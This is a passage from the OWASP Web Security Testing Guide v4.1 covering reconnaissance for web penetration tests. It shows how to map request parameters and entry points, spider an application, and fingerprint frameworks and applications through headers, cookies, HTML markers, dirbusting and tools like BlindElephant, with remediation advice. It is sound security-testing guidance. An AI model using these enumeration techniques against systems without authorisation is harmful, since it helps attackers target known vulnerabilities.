application</p><p>How to Test</p><p>Before any testing begins, the tester should always get a good understanding of the application and how the user and</p><p>browser communicates with it. As the tester walks through the application, they should pay attention to all HTTP</p><p>requests as well as every parameter and form field that is passed to the application. They should pay special attention</p><p>to when GET requests are used and when POST requests are used to pass parameters to the application. In addition,</p><p>they also need to pay attention to when other methods for RESTful services are used.</p><p>Note that in order to see the parameters sent in the body of requests such as a POST request, the tester may want to</p><p>use a tool such as an intercepting proxy (See tools). Within the POST request, the tester should also make special note</p><p>of any hidden form fields that are being passed to the application, as these usually contain sensitive information, such</p><p>as state information, quantity of items, the price of items, that the developer never intended for you to see or change.</p><p>In the author’s experience, it has been very useful to use an intercepting proxy and a spreadsheet for this stage of the</p><p>testing. The proxy will keep track of every request and response between the tester and the application as they walk</p><p>through it. Additionally,</p><p>at this point, testers usually trap every request and response so that they can see exactly every</p><p>header, parameter, etc. that is being passed to the application and what is being returned. This can be quite tedious at</p><p>times, especially on large interactive sites (think of a banking application). However, experience will show what to look</p><p>for and this phase can be significantly reduced.</p><p>As the tester walks through the application, they should take note of any interesting parameters in the URL, custom</p><p>headers, or body of the requests/responses, and save them in a spreadsheet. The spreadsheet should include the</p><p>page requested (it might be good to also add the request number from the proxy, for future reference), the interesting</p><p>parameters, the type of request (POST/GET), if access is authenticated/unauthenticated, if SSL is used, if it’s part of a</p><p>multi-step process, and any other relevant notes. Once they have every area of the application mapped out, then they</p><p>can go through the application and test each of the areas that they have identified and make notes for what worked and</p><p>what didn’t work. The rest of this guide will identify how to test each of these areas of interest, but this section must be</p><p>undertaken before any of the actual testing can commence.</p><p>Below are some points of interests for all requests and responses. Within the requests section, focus on the GET and</p><p>POST methods, as these appear the majority of the requests. Note that other methods, such as PUT and DELETE, can</p><p>be used. Often, these more rare requests, if allowed, can expose vulnerabilities. There is a special section in this guide</p><p>dedicated for testing these HTTP methods.</p><p>Requests</p><p>Identify where GETs are used and where POSTs are used.</p><p>Identify all parameters used in a POST request (these are in the body of the request).</p><p>Web Security Testing Guide v4.1</p><p>67</p><p>Within the POST request, pay special attention to any hidden parameters. When a POST is sent all the form fields</p><p>(including hidden parameters) will be sent in the body of the HTTP message to the application. These typically</p><p>aren’t seen unless a proxy or view the HTML source code is used. In addition, the next page shown, its data, and</p><p>the level of access can all be different depending on the value of the hidden parameter(s).</p><p>Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).</p><p>Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar . Also note that</p><p>many parameters can be in one query string such as separated by a & , \~ , : , or any other special character or</p><p>encoding.</p><p>A special note when it comes to identifying multiple parameters in one string or within a POST request is that some</p><p>or all of the parameters will be needed to execute the attacks. The tester needs to identify all of the parameters</p><p>(even if encoded or encrypted) and identify which ones are processed by the application. Later sections of the</p><p>guide will identify how to test these parameters. At this point, just make sure each one of them is identified.</p><p>Also pay attention to any additional or custom type headers not typically seen (such as debug=False).</p><p>Responses</p><p>Identify where new cookies are set (Set-Cookie header), modified, or added to.</p><p>Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and</p><p>500 internal server errors during normal responses (i.e., unmodified requests).</p><p>Also note where any interesting headers are used. For example, “Server: BIG-IP” indicates that the site is load</p><p>balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to</p><p>make multiple requests to access the vulnerable server, depending on the type of load balancing used.</p><p>Black-Box Testing</p><p>Testing for Application Entry Points</p><p>The following are two examples on how to check for application entry points.</p><p>EXAMPLE 1</p><p>This example shows a GET request that would purchase an item from an online shopping application.</p><p>GET /shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x HTTP/1.1</p><p>Host: x.x.x.x</p><p>Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy</p><p>Here the tester would note all the parameters of the request such as CUSTOMERID, ITEM, PRICE, IP, and the</p><p>Cookie (which could just be encoded parameters or used for session state).</p><p>EXAMPLE 2</p><p>This example shows a POST request that would log you into an application.</p><p>POST /KevinNotSoGoodApp/authenticate.asp?service=login HTTP/1.1</p><p>Host: x.x.x.x</p><p>Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMT</p><p>IzNA==</p><p>CustomCookie=00my00trusted00ip00is00x.x.x.x00</p><p>user=admin&pass=pass123&debug=true&fromtrustIP=true</p><p>In this example the tester would note all the parameters as they have before, however the majority of the</p><p>parameters are passed in the body of the request and not in the URL. Additionally, note that there is a custom</p><p>HTTP header ( CustomCookie ) being used.</p><p>Gray-Box Testing</p><p>Web Security Testing Guide v4.1</p><p>68</p><p>Testing for application entry points via a gray-box methodology would consist of everything already identified above</p><p>with one addition. In cases where there are external sources from which the application receives data and processes it</p><p>(such as SNMP traps, syslog messages, SMTP, or SOAP messages from other servers) a meeting with the application</p><p>developers could identify any functions that would accept or expect user input and how they are formatted. For</p><p>example, the developer could help in understanding how to formulate a correct SOAP request that the application</p><p>would accept and where the web service resides (if the web service or any other function hasn’t already been identified</p><p>during the black-box testing).</p><p>OWASP Attack Surface Detector</p><p>The Attack Surface Detector (ASD) tool investigates the source code and uncovers the endpoints of a web application,</p><p>the parameters these endpoints accept, and the data type of those parameters. This includes the unlinked endpoints a</p><p>spider will not be able to find, or optional parameters totally unused in client-side code. It also has the capability to</p><p>calculate the changes in attack surface between two versions of an application.</p><p>The Attack Surface Detector is available as a plugin to both ZAP and Burp Suite, and a Command Line Interface (CLI)</p><p>tool is also available. The CLI tool exports the attack surface as a JSON output, which can then be used by the ZAP and</p><p>Burp Suite plugin. This is helpful for cases where the source code is not provided to the penetration tester directly. For</p><p>example, the penetration tester can get the json output file from a customer who does not want to provide the source</p><p>code itself.</p><p>How to Use</p><p>The CLI jar file is downloadable from https://github.com/secdec/attack-surface-detector-cli/releases.</p><p>You can run the following command for ASD to identify endpoints from the source code of the target web application.</p><p>java -jar attack-surface-detector-cli-1.3.5.jar <source-code-path> [flags]</p><p>Here is an example of running the command against OWASP RailsGoat.</p><p>$ java -jar attack-surface-detector-cli-1.3.5.jar railsgoat/</p><p>Beginning endpoint detection for '<...>/railsgoat' with 1 framework types</p><p>Using framework=RAILS</p><p>[0] GET: /login (0 variants): PARAMETERS={url=name=url, paramType=QUERY_STRING, dataType=STRING};</p><p>FILE=/app/controllers/sessions_contro</p><p>ller.rb (lines '6'-'9')</p><p>[1] GET: /logout (0 variants): PARAMETERS={}; FILE=/app/controllers/sessions_controller.rb (lines</p><p>'33'-'37')</p><p>[2] POST: /forgot_password (0 variants): PARAMETERS={email=name=email, paramType=QUERY_STRING,</p><p>dataType=STRING}; FILE=/app/controllers/</p><p>password_resets_controller.rb (lines '29'-'38')</p><p>[3] GET: /password_resets (0 variants): PARAMETERS={token=name=token, paramType=QUERY_STRING,</p><p>dataType=STRING}; FILE=/app/controllers/p</p><p>assword_resets_controller.rb (lines '19'-'27')</p><p>[4] POST: /password_resets (0 variants): PARAMETERS={password=name=password,</p><p>paramType=QUERY_STRING,</p><p>dataType=STRING, user=name=user, paramType=QUERY_STRING, dataType=STRING,</p><p>confirm_password=name=confirm_password, paramType=QUERY_STRING, dataType=STRING};</p><p>FILE=/app/controllers/password_resets_controller.rb (lines '5'-'17')</p><p>[5] GET: /sessions/new (0 variants): PARAMETERS={url=name=url, paramType=QUERY_STRING,</p><p>dataType=STRING}; FILE=/app/controllers/sessions_controller.rb (lines '6'-'9')</p><p>[6] POST: /sessions (0 variants): PARAMETERS={password=name=password, paramType=QUERY_STRING,</p><p>dataType=STRING, user_id=name=user_id, paramType=SESSION, dataType=STRING,</p><p>remember_me=name=remember_me, paramType=QUERY_STRING, dataType=STRING, url=name=url,</p><p>paramType=QUERY_STRING, dataType=STRING, email=name=email, paramType=QUERY_STRING, dataType=STRING};</p><p>FILE=/app/controllers/sessions_controller.rb (lines '11'-'31')</p><p>[7] DELETE: /sessions/{id} (0 variants): PARAMETERS={}; FILE=/app/controllers/sessions_controller.rb</p><p>(lines '33'-'37')</p><p>[8] GET: /users (0 variants): PARAMETERS={}; FILE=/app/controllers/api/v1/users_controller.rb (lines</p><p>'9'-'11')</p><p>[9] GET: /users/{id} (0 variants): PARAMETERS={}; FILE=/app/controllers/api/v1/users_controller.rb</p><p>(lines '13'-'15')</p><p>... snipped ...</p><p>[38] GET: /api/v1/mobile/{id} (0 variants): PARAMETERS={id=name=id, paramType=QUERY_STRING,</p><p>https://github.com/secdec/attack-surface-detector-cli/releases</p><p>https://github.com/OWASP/railsgoat</p><p>Web Security Testing Guide v4.1</p><p>69</p><p>dataType=STRING, class=name=class, paramType=QUERY_STRING, dataType=STRING};</p><p>FILE=/app/controllers/api/v1/mobile_controller.rb (lines '8'-'13')</p><p>[39] GET: / (0 variants): PARAMETERS={url=name=url, paramType=QUERY_STRING, dataType=STRING};</p><p>FILE=/app/controllers/sessions_controller.rb (lines '6'-'9')</p><p>Generated 40 distinct endpoints with 0 variants for a total of 40 endpoints</p><p>Successfully validated serialization for these endpoints</p><p>0 endpoints were missing code start line</p><p>0 endpoints were missing code end line</p><p>0 endpoints had the same code start and end line</p><p>Generated 36 distinct parameters</p><p>Generated 36 total parameters</p><p>- 36/36 have their data type</p><p>- 0/36 have a list of accepted values</p><p>- 36/36 have their parameter type</p><p>--- QUERY_STRING: 35</p><p>--- SESSION: 1</p><p>Finished endpoint detection for '<...>/railsgoat'</p><p>----------</p><p>-- DONE --</p><p>0 projects had duplicate endpoints</p><p>Generated 40 distinct endpoints</p><p>Generated 40 total endpoints</p><p>Generated 36 distinct parameters</p><p>Generated 36 total parameters</p><p>1/1 projects had endpoints generated</p><p>To enable logging include the -debug argument</p><p>You can also generate a JSON output file using the -json flag, which can be used by the plugin to both ZAP and Burp</p><p>Suite. See the following links for more details.</p><p>Home of ASD Plugin for OWASP ZAP</p><p>Home of ASD Plugin for PortSwigger Burp</p><p>Tools</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>Burp Suite</p><p>Fiddler</p><p>References</p><p>RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1</p><p>OWASP Attack Surface Detector</p><p>https://github.com/secdec/attack-surface-detector-zap/wiki</p><p>https://github.com/secdec/attack-surface-detector-burp/wiki</p><p>https://www.zaproxy.org/</p><p>https://www.portswigger.net/burp/</p><p>https://www.telerik.com/fiddler</p><p>https://tools.ietf.org/html/rfc2616</p><p>https://owasp.org/www-project-attack-surface-detector/</p><p>Web Security Testing Guide v4.1</p><p>70</p><p>Map Execution Paths Through Application</p><p>ID</p><p>WSTG-INFO-07</p><p>Summary</p><p>Before commencing security testing, understanding the structure of the application is paramount. Without a thorough</p><p>understanding of the layout of the application, it is unlkely that it will be tested thoroughly.</p><p>Test Objectives</p><p>Map the target application and understand the principal workflows.</p><p>How to Test</p><p>In black-box testing it is extremely difficult to test the entire code base. Not just because the tester has no view of the</p><p>code paths through the application, but even if they did, to test all code paths would be very time consuming. One way</p><p>to reconcile this is to document what code paths were discovered and tested.</p><p>There are several ways to approach the testing and measurement of code coverage:</p><p>Path - test each of the paths through an application that includes combinatorial and boundary value analysis</p><p>testing for each decision path. While this approach offers thoroughness, the number of testable paths grows</p><p>exponentially with each decision branch.</p><p>Data Flow (or Taint Analysis) - tests the assignment of variables via external interaction (normally users). Focuses</p><p>on mapping the flow, transformation and use of data throughout an application.</p><p>Race - tests multiple concurrent instances of the application manipulating the same data.</p><p>The trade off as to what method is used and to what degree each method is used should be negotiated with the</p><p>application owner. Simpler approaches could also be adopted, including asking the application owner what functions</p><p>or code sections they are particularly concerned about and how those code segments can be reached.</p><p>Black-Box Testing</p><p>To demonstrate code coverage to the application owner, the tester can start with a spreadsheet and document all the</p><p>links discovered by spidering the application (either manually or automatically). Then the tester can look more closely</p><p>at decision points in the application and investigate how many significant code paths are discovered. These should</p><p>then be documented in the spreadsheet with URLs, prose and screenshot descriptions of the paths discovered.</p><p>Gray-Box or White-Box Testing</p><p>Ensuring sufficient code coverage for the application owner is far easier with gray-box and white-box approach to</p><p>testing. Information solicited by and provided to the tester will ensure the minimum requirements for code coverage are</p><p>met.</p><p>Example</p><p>Automatic Spidering</p><p>The automatic spider is a tool used to automatically discover new resources (URLs) on a particular website. It begins</p><p>with a list of URLs to visit, called the seeds, which depends on how the Spider is started. While there are a lot of</p><p>Spidering tools, the following example uses the Zed Attack Proxy (ZAP):</p><p>https://github.com/zaproxy/zaproxy</p><p>Web Security Testing Guide v4.1</p><p>71</p><p>Figure 4.1.7-1: Zed Attack Proxy Screen</p><p>ZAP offers the following automatic spidering features, which can be selected based on the tester’s needs:</p><p>Spider Site - The seed list contains all the existing URIs already found for the selected site.</p><p>Spider Subtree - The seed list contains all the existing URIs already found and present in the subtree of the</p><p>selected node.</p><p>Spider URL - The seed list contains only the URI corresponding to the selected node (in the Site Tree).</p><p>Spider all in Scope - The seed list contains all the URIs the user has selected as being ‘In Scope’.</p><p>Tools</p><p>Zed Attack Proxy (ZAP)</p><p>List of spreadsheet software</p><p>Diagramming software</p><p>References</p><p>Whitepapers</p><p>Code Coverage</p><p>https://github.com/zaproxy/zaproxy</p><p>https://github.com/zaproxy/zaproxy</p><p>https://en.wikipedia.org/wiki/List_of_spreadsheet_software</p><p>https://en.wikipedia.org/wiki/List_of_concept-_and_mind-mapping_software</p><p>https://en.wikipedia.org/wiki/Code_coverage</p><p>Web Security Testing Guide v4.1</p><p>72</p><p>Fingerprint Web Application Framework</p><p>ID</p><p>WSTG-INFO-08</p><p>Summary</p><p>Web framework[*] fingerprinting is an important subtask of the information gathering process. Knowing the type of</p><p>framework can automatically give a great advantage if such a framework has already been tested by the penetration</p><p>tester. It is not only the known vulnerabilities in unpatched versions but specific misconfigurations in the framework and</p><p>known file structure that makes the fingerprinting process so important.</p><p>Several different vendors and versions of web frameworks are widely used. Information about it significantly helps in</p><p>the testing process, and can also help in changing the course of the test. Such information can be derived by careful</p><p>analysis of certain common locations. Most of the web frameworks have several markers in those locations which help</p><p>an attacker to spot them. This is basically what all automatic tools do, they look for a marker from a predefined location</p><p>and then compare it to</p><p>the database of known signatures. For better accuracy several markers are usually used.</p><p>[*] Please note that this article makes no differentiation between Web Application Frameworks and Content</p><p>Management Systems (CMS). This has been done to make it convenient to fingerprint both of them in one chapter.</p><p>Furthermore, both categories are referenced as web frameworks.</p><p>Test Objectives</p><p>To define type of used web framework so as to have a better understanding of the security testing methodology.</p><p>How to Test</p><p>Black-Box Testing</p><p>There are several most common locations to look in in order to define the current framework:</p><p>HTTP headers</p><p>Cookies</p><p>HTML source code</p><p>Specific files and folders</p><p>File Extensions</p><p>Error Message</p><p>HTTP Headers</p><p>The most basic form of identifying a web framework is to look at the X-Powered-By field in the HTTP response header.</p><p>Many tools can be used to fingerprint a target. The simplest one is netcat utility.</p><p>Consider the following HTTP Request-Response:</p><p>$ nc 127.0.0.1 80</p><p>HEAD / HTTP/1.0</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.0.14</p><p>Date: Sat, 07 Sep 2013 08:19:15 GMT</p><p>Content-Type: text/html;charset=ISO-8859-1</p><p>Connection: close</p><p>Web Security Testing Guide v4.1</p><p>73</p><p>Vary: Accept-Encoding</p><p>X-Powered-By: Mono</p><p>From the X-Powered-By field, we understand that the web application framework is likely to be Mono. However,</p><p>although this approach is simple and quick, this methodology doesn’t work in 100% of cases. It is possible to easily</p><p>disable X-Powered-By header by a proper configuration. There are also several techniques that allow a web site to</p><p>obfuscate HTTP headers (see an example in the Remediation section).</p><p>So in the same example the tester could either miss the X-Powered-By header or obtain an answer like the following:</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.0.14</p><p>Date: Sat, 07 Sep 2013 08:19:15 GMT</p><p>Content-Type: text/html;charset=ISO-8859-1</p><p>Connection: close</p><p>Vary: Accept-Encoding</p><p>X-Powered-By: Blood, sweat and tears</p><p>Sometimes there are more HTTP-headers that point at a certain web framework. In the following example, according to</p><p>the information from HTTP-request, one can see that X-Powered-By header contains PHP version. However, the X-</p><p>Generator header points out the used framework is actually Swiftlet, which helps a penetration tester to expand his</p><p>attack vectors. When performing fingerprinting, always carefully inspect every HTTP-header for such leaks.</p><p>HTTP/1.1 200 OK</p><p>Server: nginx/1.4.1</p><p>Date: Sat, 07 Sep 2013 09:22:52 GMT</p><p>Content-Type: text/html</p><p>Connection: keep-alive</p><p>Vary: Accept-Encoding</p><p>X-Powered-By: PHP/5.4.16-1~dotdeb.1</p><p>Expires: Thu, 19 Nov 1981 08:52:00 GMT</p><p>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0</p><p>Pragma: no-cache</p><p>X-Generator: Swiftlet</p><p>Cookies</p><p>Another similar and somehow more reliable way to determine the current web framework are framework-specific</p><p>cookies.</p><p>Consider the following HTTP-request:</p><p>Figure 4.1.8-1: Cakephp HTTP Request</p><p>The cookie CAKEPHP has automatically been set, which gives information about the framework being used. List of</p><p>common cookies names is presented in Cookies section. Limitations are the same - it is possible to change the name</p><p>of the cookie. For example, for the selected CakePHP framework this could be done by the following configuration</p><p>(excerpt from core.php):</p><p>Web Security Testing Guide v4.1</p><p>74</p><p>/**</p><p>* The name of CakePHP's session cookie.</p><p>*</p><p>* Note the guidelines for Session names states: "The session name references</p><p>* the session id in cookies and URLs. It should contain only alphanumeric</p><p>* characters."</p><p>* @link http://php.net/session_name</p><p>*/</p><p>Configure::write('Session.cookie', 'CAKEPHP');</p><p>However, these changes are less likely to be made than changes to the X-Powered-By header, so this approach can</p><p>be considered as more reliable.</p><p>HTML Source Code</p><p>This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of</p><p>information which helps a tester to recognize a specific web framework. One of the common markers are HTML</p><p>comments that directly lead to framework disclosure. More often certain framework-specific paths can be found, i.e.</p><p>links to framework-specific CSS or JS folders. Finally, specific script variables might also point to a certain framework.</p><p>From the screenshot below one can easily learn the used framework and its version by the mentioned markers. The</p><p>comment, specific paths and script variables can all help an attacker to quickly determine an instance of ZK framework.</p><p>Figure 4.1.8-2: Cakephp HTTP Request</p><p>More frequently such information is placed between <head>``</head> tags, in <meta> tags or at the end of the page.</p><p>Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as</p><p>inspection of other useful comments and hidden fields. Sometimes, web developers do not care much about hiding</p><p>information about the framework used. It is still possible to stumble upon something like this at the bottom of the page:</p><p>Figure 4.1.8-3: Banshee Bottom Page</p><p>File Extensions</p><p>URL may include file extensions. The file extensions can also help to identify the web platform or technology.</p><p>For example, OWASP is using PHP</p><p>https://www.owasp.org/index.php?title=Fingerprint_Web_Application_Framework&action=edit&section=4</p><p>Here are some common web extensions and technology</p><p>php – PHP</p><p>aspx – Microsoft ASP.NET</p><p>jsp – Java Server Pages</p><p>Error Message</p><p>Common Frameworks</p><p>Web Security Testing Guide v4.1</p><p>75</p><p>Cookies</p><p>Framework Cookie name</p><p>Zope zope3</p><p>CakePHP cakephp</p><p>Kohana kohanasession</p><p>Laravel laravel_session</p><p>HTML Source Code</p><p>General Markers</p><p>%framework_name%</p><p>powered by</p><p>built upon</p><p>running</p><p>Specific Markers</p><p>Framework Keyword</p><p>Adobe ColdFusion <!– START headerTags.cfm</p><p>Microsoft ASP.NET __VIEWSTATE</p><p>ZK <!– ZK</p><p>Business Catalyst <!– BC_OBNW –></p><p>Indexhibit ndxz-studio</p><p>Specific Files and Folders</p><p>Specific files and folders are different for each specific framework. It is recommended to install the corresponding</p><p>framework during penetration tests in order to have better understanding of what infrastructure is presented and what</p><p>files might be left on the server. However, several good file lists already exist and one good example is FuzzDB</p><p>wordlists of predictable files/folders.</p><p>Tools</p><p>A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-</p><p>based fingerprinting tools.</p><p>WhatWeb</p><p>Website: https://www.morningstarsecurity.com/research/whatweb</p><p>Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build. Language: Ruby</p><p>Matches for fingerprinting are made with:</p><p>Text strings (case sensitive)</p><p>Regular expressions</p><p>Google Hack Database queries (limited set of keywords)</p><p>MD5 hashes</p><p>URL recognition</p><p>HTML tag patterns</p><p>Custom ruby code for passive and aggressive operations</p><p>Sample output is presented on a screenshot below:</p><p>https://github.com/fuzzdb-project/fuzzdb</p><p>https://www.morningstarsecurity.com/research/whatweb</p><p>https://www.kali.org/</p><p>Web Security Testing Guide v4.1</p><p>76</p><p>Figure 4.1.8-4: Whatweb Output sample</p><p>BlindElephant</p><p>Website:http://blindelephant.sourceforge.net/</p><p>This great tool works on the principle of static file checksum based version difference thus providing a very high quality</p><p>of fingerprinting. Language: Python</p><p>Sample output of a successful fingerprint:</p><p>pentester$ python BlindElephant.py http://my_target drupal</p><p>Loaded /Library/Python/2.7/site-packages/blindelephant/dbs/drupal.pkl with 145 versions, 478</p><p>differentiating paths, and 434 version groups.</p><p>Starting BlindElephant fingerprint for version of drupal at http://my_target</p><p>Hit http://my_target/CHANGELOG.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint.</p><p>527b085a3717bd691d47713dff74acf4</p><p>Hit http://my_target/INSTALL.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint.</p><p>14dfc133e4101be6f0ef5c64566da4a4</p><p>Hit http://my_target/misc/drupal.js</p><p>Possible versions</p><p>based on result: 7.12, 7.13, 7.14</p><p>Hit http://my_target/MAINTAINERS.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint.</p><p>36b740941a19912f3fdbfcca7caa08ca</p><p>Hit http://my_target/themes/garland/style.css</p><p>Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13,</p><p>7.14</p><p>...</p><p>Fingerprinting resulted in:</p><p>7.14</p><p>Best Guess: 7.14</p><p>Wappalyzer</p><p>http://blindelephant.sourceforge.net/</p><p>Web Security Testing Guide v4.1</p><p>77</p><p>Website: https://www.wappalyzer.com/</p><p>Wapplyzer is a Firefox Chrome extension. It works only on regular expression matching and doesn’t need anything</p><p>other than the page to be loaded on browser. It works completely at the browser level and gives results in the form of</p><p>icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to</p><p>construct a target website immediately after browsing a page.</p><p>Note that by default, Wappalyzer will send anonymised data about the technology running on visited websites back to</p><p>the developers, which is then sold to third parties. Make sure you disable this data collection in the add-on options.</p><p>Sample output of a plug-in is presented on a screenshot below.</p><p>Figure 4.1.8-5: Wappalyzer Output for OWASP Website</p><p>References</p><p>Whitepapers</p><p>Saumil Shah: “An Introduction to HTTP fingerprinting”</p><p>Anant Shrivastava : “Web Application Finger Printing”</p><p>Remediation</p><p>The general advice is to use several of the tools described above and check logs to better understand what exactly</p><p>helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide</p><p>framework tracks, it’s possible to achieve a better level of security and to make sure of the framework can not be</p><p>detected by automatic scans. Below are some specific recommendations by framework marker location and some</p><p>additional interesting approaches.</p><p>HTTP Headers</p><p>Check the configuration and disable or obfuscate all HTTP-headers that disclose information the technologies used.</p><p>Here is an interesting article about HTTP-headers obfuscation using Netscaler</p><p>Cookies</p><p>It is recommended to change cookie names by making changes in the corresponding configuration files.</p><p>HTML Source Code</p><p>Manually check the contents of the HTML code and remove everything that explicitly points to the framework.</p><p>General guidelines:</p><p>Make sure there are no visual markers disclosing the framework</p><p>Remove any unnecessary comments (copyrights, bug information, specific framework comments)</p><p>https://www.wappalyzer.com/</p><p>https://web.archive.org/web/20190526182734/https://net-square.com/httprint_paper.html</p><p>https://anantshri.info/articles/web_app_finger_printing.html</p><p>Web Security Testing Guide v4.1</p><p>78</p><p>Remove META and generator tags</p><p>Use the companies own CSS or JS files and do not store those in a framework-specific folders</p><p>Do not use default scripts on the page or obfuscate them if they must be used.</p><p>Specific Files and Folders</p><p>General guidelines:</p><p>Remove any unnecessary or unused files on the server. This implies text files disclosing information about</p><p>versions and installation too.</p><p>Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be</p><p>done, for example, by modifying htaccess file and adding RewriteCond or RewriteRule there. An example of such</p><p>restriction for two common WordPress folders is presented below.</p><p>RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR]</p><p>RewriteCond %{REQUEST_URI} /wp-admin/$</p><p>RewriteRule $ /http://your_website [R=404,L]</p><p>However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific</p><p>plugins exist. One example for WordPress is StealthLogin.</p><p>Additional Approaches</p><p>General guidelines:</p><p>Checksum management The purpose of this approach is to beat checksum-based scanners and not let them</p><p>disclose files by their hashes. Generally, there are two approaches in checksum management:</p><p>Change the location of where those files are placed (i.e. move them to another folder, or rename the existing</p><p>folder)</p><p>Modify the contents - even slight modification results in a completely different hash sum, so adding a single</p><p>byte in the end of the file should not be a big problem.</p><p>Controlled chaos A funny and effective method that involves adding bogus files and folders from other frameworks</p><p>in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders and to</p><p>break the current framework!</p><p>https://wordpress.org/plugins/stealth-login-page</p><p>Web Security Testing Guide v4.1</p><p>79</p><p>Fingerprint Web Application</p><p>ID</p><p>WSTG-INFO-09</p><p>Summary</p><p>There is nothing new under the sun, and nearly every web application that one may think of developing has already</p><p>been developed. With the vast number of free and open source software projects that are actively developed and</p><p>deployed around the world, it is very likely that an application security test will face a target site that is entirely or partly</p><p>dependent on these well known applications (e.g. Wordpress, phpBB, Mediawiki, etc). Knowing the web application</p><p>components that are being tested significantly helps in the testing process and will also drastically reduce the effort</p><p>required during the test. These well known web applications have known HTML headers, cookies, and directory</p><p>structures that can be enumerated to identify the application.</p><p>Test Objectives</p><p>Identify the web application and version to determine known vulnerabilities and the appropriate exploits to use during</p><p>testing.</p><p>How to Test</p><p>Cookies</p><p>A relatively reliable way to identify a web application is by the application-specific cookies.</p><p>Consider the following HTTP-request:</p><p>GET / HTTP/1.1</p><p>User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0</p><p>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</p><p>Accept-Language: en-US,en;q=0.5</p><p>'''Cookie: wp-settings-time-1=1406093286; wp-settings-time-2=1405988284'''</p><p>DNT: 1</p><p>Connection: keep-alive</p><p>Host: blog.owasp.org</p><p>The cookie wp-settings-time-1 has automatically been set, which gives information about the framework being used.</p><p>List of common cookies names is presented in Common Application Identifiers section. However, it is possible to</p><p>change the name of the cookie.</p><p>HTML Source Code</p><p>This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of</p><p>information which helps a tester to recognize a specific web application. One of the common markers are HTML</p><p>comments that directly lead to application disclosure. More often certain application-specific paths can be found, i.e.</p><p>links to application-specific CSS or JS folders. Finally, specific script variables might also point to a certain application.</p><p>From the meta tag below, one can easily learn the application used by a website and its version. The comment, specific</p><p>paths and script variables can all help an attacker to quickly determine an instance of an application.</p><p><meta name="generator" content="WordPress 3.9.2" /></p><p>Web Security Testing Guide v4.1</p><p>80</p><p>More frequently such information is placed between <head> </head> tags, in <meta> tags or at the end of the page.</p><p>Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as</p><p>inspection of other useful comments and hidden fields.</p><p>Specific Files and Folders</p><p>Apart from information gathered from HTML sources, there is another approach which greatly helps an attacker to</p><p>determine the application with high accuracy. Every application has its own specific file and folder structure on the</p><p>server. It has been pointed out that one can see the specific path from the HTML page source but sometimes they are</p><p>not explicitly presented there and still reside on the server.</p><p>In order to uncover them a technique known as dirbusting is used. Dirbusting is brute forcing a target with predictable</p><p>folder and file names and monitoring HTTP-responses to emumerate server</p><p>contents. This information can be used</p><p>both for finding default files and attacking them, and for fingerprinting the web application. Dirbusting can be done in</p><p>several ways, the example below shows a successful dirbusting attack against a WordPress-powered target with the</p><p>help of defined list and intruder functionality of Burp Suite.</p><p>Figure 4.1.9-1: Dirbusting with Burp</p><p>We can see that for some WordPress-specific folders (for instance, /wp-includes/ , /wp-admin/ and /wp-content/ )</p><p>HTTP-reponses are 403 (Forbidden), 302 (Found, redirection towp-login.php) and 200 (OK) respectively. This is a</p><p>good indicator that the target is WordPress-powered. The same way it is possible to dirbust different application plugin</p><p>folders and their versions. On the screenshot below one can see a typical CHANGELOG file of a Drupal plugin, which</p><p>provides information on the application being used and discloses a vulnerable plugin version.</p><p>Web Security Testing Guide v4.1</p><p>81</p><p>Figure 4.1.9-2: Drupal Botcha Disclosure</p><p>Tip: before starting dirbusting, it is recommended to check the robots.txt file first. Sometimes application specific folders</p><p>and other sensitive information can be found there as well. An example of such a robots.txt file is presented on a</p><p>screenshot below.</p><p>Web Security Testing Guide v4.1</p><p>82</p><p>Figure 4.1.9-3: Robots Info Disclosure</p><p>Specific files and folders are different for each specific application. It is recommended to install the corresponding</p><p>application during penetration tests in order to have better understanding of what infrastructure is presented and what</p><p>files might be left on the server. However, several good file lists already exist and one good example is FuzzDB</p><p>wordlists of predictable files/folders.</p><p>Common Application Identifiers</p><p>Cookies</p><p>phpBB phpbb3_</p><p>Wordpress wp-settings</p><p>1C-Bitrix BITRIX_</p><p>AMPcms AMP</p><p>Django CMS django</p><p>DotNetNuke DotNetNukeAnonymous</p><p>e107 e107_tz</p><p>EPiServer EPiTrace, EPiServer</p><p>Graffiti CMS graffitibot</p><p>Hotaru CMS hotaru_mobile</p><p>ImpressCMS ICMSession</p><p>Indico MAKACSESSION</p><p>InstantCMS InstantCMS[logdate]</p><p>Kentico CMS CMSPreferredCulture</p><p>MODx SN4[12symb]</p><p>TYPO3 fe_typo_user</p><p>Dynamicweb Dynamicweb</p><p>LEPTON 